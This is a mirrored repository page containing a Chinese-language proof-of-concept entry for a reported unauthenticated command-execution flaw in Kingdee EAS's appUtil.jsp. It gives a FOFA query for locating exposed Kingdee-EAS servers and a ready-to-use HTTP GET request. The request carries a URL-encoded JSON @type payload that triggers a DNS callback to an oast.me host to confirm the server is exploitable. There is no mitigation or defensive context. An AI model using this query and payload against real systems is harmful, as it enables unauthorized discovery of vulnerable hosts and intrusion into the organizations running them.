admin/POC
1
0
Fork 0
mirror of https://github.com/eeeeeeeeee-code/POC.git synced 2025-05-05 10:17:57 +00:00
Code Issues Packages Projects Releases Wiki Activity
POC/wpoc/金蝶/金蝶EAS存在appUtil.jsp命令执行漏洞.md
eeeeeeeeee-code 06c8413e64 first commit
2025-03-04 23:12:57 +08:00

847 B
Raw Blame History

金蝶EAS存在appUtil.jsp命令执行漏洞

金蝶EAS和金蝶EAS Cloud在多个版本中存在文件上传漏洞未经授权的攻击者可以通过特制的请求包或上传恶意的webshell文件从而进行远程代码执行控制服务器。

fofa

app="Kingdee-EAS"

poc

GET /easportal/tools/appUtil.jsp?list=%7B%22x%22%3A%7B%22%40type%22%3A%22java.net.Inet4Address%22%2C%22val%22%3A%22csbs1ru8ki46d67eiob0ywz51btedcjtj.oast.me%22%7D%7D HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept-Encoding: gzip, deflate

img

漏洞来源